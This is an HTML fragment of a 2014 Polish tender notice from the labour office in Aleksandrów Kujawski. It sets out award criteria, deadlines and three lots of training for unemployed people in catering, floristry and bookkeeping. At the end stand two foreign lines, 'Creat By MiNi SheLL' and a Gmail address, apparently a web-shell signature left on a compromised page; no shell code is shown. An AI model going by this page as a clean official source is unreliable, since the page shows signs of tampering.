<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 60</li>
<li>2 - Posiadanie przez Wykonawcę certyfikatu jakości usług ( np. akredytacja w zakresie przedmiotowego szkolenia, ISO, itp.) - 20</li>
<li>3 - Doświadczenie Wykonawcy w zakresie organizacji szkoleń obejmujących przedmiot zamówienia - 20</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Na podstawie art. 144 ust. 1 Zamawiający zastrzega sobie możliwość zmiany umowy w zakresie liczby osób skierowanych na szkolenie ( w takim przypadku Zamawiający dokona zapłaty za liczbę osób faktycznie przeszkolonych), przesunięcia terminu realizacji szkolenia, uzasadnioną zmianę miejsca organizacji szkolenia, dokonanie zmiany wykładowcy po podpisaniu umowy, pod warunkiem, że nowo wskazany wykładowca będzie posiadał wykształcenie i doświadczenie w zakresie ilości przeprowadzonych szkoleń z zakresu objętego zamówieniem równoważne do zmienianego wykładowcy</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pup-aleksandrowkujawski.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Urząd Pracy w Aleksandrowie Kujawskim
ul. Przemysłowa 1
87 - 700 Aleksandrów Kujawski.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.08.2014 godzina 11:00, miejsce: Powiatowy Urząd Pracy w Aleksandrowie Kujawskim
ul. Przemysłowa 1
87 - 700 Aleksandrów Kujawski
pokój 23 (sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pracownik gastronomii.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1)	Szkolenie musi odbywać się w miejscowości Aleksandrów Kujawski.
2) Szkoleniem objętych będzie 12 osób bezrobotnych, zarejestrowanych 
w Powiatowym Urzędzie Pracy w Aleksandrowie Kujawskim, skierowanych na szkolenie w jednej grupie, w ramach środków projektu W DRODZE PO SUKCES Programu Operacyjnego Kapitał Ludzki współfinansowanego z Europejskiego Funduszu Społecznego. Rozpoczęcie szkolenia przewidziane jest 
w III kwartale bieżącego roku.
3) Minimalna ilość godzin przypadająca na każdego uczestnika szkolenia - 120 godzin zegarowych kursu ( gdzie godzina zegarowa kursu liczy 60 minut i obejmuje zajęcia edukacyjne liczące 45 min. oraz przerwę, liczącą średnio 15 minut; długość przerw może być ustalana w sposób elastyczny). Czas realizacji jest to faktyczny czas przebywania uczestnika szkolenia na zajęciach w godzinach zegarowych tj. od godziny rozpoczęcia do godziny ich zakończenia, łącznie z czasem przeznaczonym na przerwy. Szkolenie musi być przeprowadzone w formie wykładów teoretycznych i ćwiczeń praktycznych. Zajęcia praktyczne muszą zostać zrealizowane w wymiarze co najmniej 80 godzin, z czego 40% zajęć praktycznych musi być przeprowadzona w funkcjonującym lokalu gastronomicznym. W ramach szkolenia musi zostać zrealizowany moduł z zakresu obsługi kas fiskalnych w wymiarze co najmniej 8 godzin..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.10.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Posiadanie przez Wykonawcę certyfikatu jakości usług ( np. akredytacja w zakresie przedmiotowego szkolenia, ISO, itp.) - 20</li>
<li>3. Doświadczenie Wykonawcy w zakresie organizacji szkoleń obejmujących przedmiot zamówienia - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Florystyka i bukieciarstwo.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1)Szkolenie musi odbywać się w miejscowości Aleksandrów Kujawski.
2) Szkolenia musi zakończyć się egzaminem wewnętrznym i wydaniem odpowiedniego zaświadczenia o ukończeniu kursu. Szkolenie powinno zostać przeprowadzone zgodnie z zasadami określonymi w rozporządzeniu Ministra Edukacji Narodowej w sprawie kształcenia ustawicznego w formach pozaszkolnych (Dz. U. z 2012r., poz.186) oraz spełniać wymogi, jeżeli takie istnieją, wynikające z odrębnych przepisów. W przypadku bezrobotnych skierowanych w ramach środków Europejskiego Funduszu Społecznego, uczestnicy otrzymują dodatkowo certyfikat stanowiący załącznik do umowy.
3) Szkoleniem objętych będzie 12 osób bezrobotnych, zarejestrowanych 
w Powiatowym Urzędzie Pracy w Aleksandrowie Kujawskim, skierowanych na szkolenie w jednej grupie, 
w ramach środków projektu W DRODZE PO SUKCES Programu Operacyjnego Kapitał Ludzki współfinansowanego z Europejskiego Funduszu Społecznego. Rozpoczęcie szkolenia przewidziane jest w III kwartale bieżącego roku.
4) Minimalna ilość godzin przypadająca na każdego uczestnika szkolenia - 120 godzin zegarowych kursu ( gdzie godzina zegarowa kursu liczy 60 minut i obejmuje zajęcia edukacyjne liczące 45 min. oraz przerwę, liczącą średnio 15 minut; długość przerw może być ustalana w sposób elastyczny). Czas realizacji jest to faktyczny czas przebywania uczestnika szkolenia na zajęciach w godzinach zegarowych tj. od godziny rozpoczęcia do godziny ich zakończenia, łącznie z czasem przeznaczonym na przerwy. Szkolenie musi być przeprowadzone w formie wykładów teoretycznych i ćwiczeń praktycznych, przy czym zajęcia praktyczne winny być przeprowadzone w wymiarze co najmniej 80 godzin. W ramach szkolenia musi zostać zrealizowany moduł z zakresu obsługi kas fiskalnych w wymiarze co najmniej 8 godzin..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.10.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Posiadanie przez Wykonawcę certyfikatu jakości usług ( np. akredytacja w zakresie przedmiotowego szkolenia, ISO, itp.) - 20</li>
<li>3. Doświadczenie Wykonawcy w zakresie organizacji szkoleń obejmujących przedmiot zamówienia - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Pracownik działu księgowości.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1) Szkolenie musi odbywać się w miejscowości Aleksandrów Kujawski. 
2) Szkoleniem objętych będzie 21 osób bezrobotnych, zarejestrowanych 
w Powiatowym Urzędzie Pracy w Aleksandrowie Kujawskim, skierowanych na szkolenie w dwóch grupach, w ramach środków projektu W DRODZE PO SUKCES Programu Operacyjnego Kapitał Ludzki współfinansowanego z Europejskiego Funduszu Społecznego - 20 osób oraz 1 osoba w ramach środków PFRON. Rozpoczęcie szkoleń przewidziane jest w III kwartale bieżącego roku.
3) Minimalna ilość godzin przypadająca na każdego uczestnika szkolenia - 140 godzin zegarowych kursu ( gdzie godzina zegarowa kursu liczy 60 minut i obejmuje zajęcia edukacyjne liczące 45 min. oraz przerwę, liczącą średnio 15 minut; długość przerw może być ustalana w sposób elastyczny). Czas realizacji jest to faktyczny czas przebywania uczestnika szkolenia na zajęciach w godzinach zegarowych tj. od godziny rozpoczęcia do godziny ich zakończenia, łącznie z czasem przeznaczonym na przerwy. Szkolenie musi być przeprowadzone w formie wykładów teoretycznych i ćwiczeń praktycznych. Przy czym zajęcia praktyczne nie mogą trwać dłużej niż 5 godzin zegarowych dziennie. W ramach szkolenia Wykonawca zobowiązany jest do zapewnienia samodzielnego stanowiska komputerowego z pełnym profesjonalnym oprogramowaniem, niezbędnym do przeprowadzenia szkolenia, dla każdego uczestnika szkolenia, na czas zajęć praktycznych. 
4) Sugerowana tematyka szkolenia (Zamawiający dopuszcza możliwość poszerzenia proponowanych tematów szkolenia o nowe zakresy tematyczne):  przepisy prawne dotyczące zagadnień księgowych i podatkowych w tym: zasad rachunkowości, ewidencji operacji gospodarczych oraz zasad prowadzenia ksiąg rachunkowych, prowadzenie ewidencji podatkowej, obowiązki zakładu pracy wobec Urzędu Skarbowego, podstawy rachunkowości finansowej, prowadzenie dokumentacji księgowej i rachunkowej, ewidencja i rozliczanie wynagrodzeń, świadczenia pieniężne z ubezpieczenia społecznego w razie choroby i macierzyństwa, obowiązki zakładu pracy wobec ZUS, ubezpieczenia społeczne, ubezpieczenia zdrowotne, składki na Fundusz Pracy i Fundusz Gwarantowanych Świadczeń Pracowniczych, inne.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Posiadanie przez Wykonawcę certyfikatu jakości usług ( np. akredytacja w zakresie przedmiotowego szkolenia, ISO, itp.) - 20</li>
<li>3. Doświadczenie Wykonawcy w zakresie organizacji szkoleń obejmujących przedmiot zamówienia - 20</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com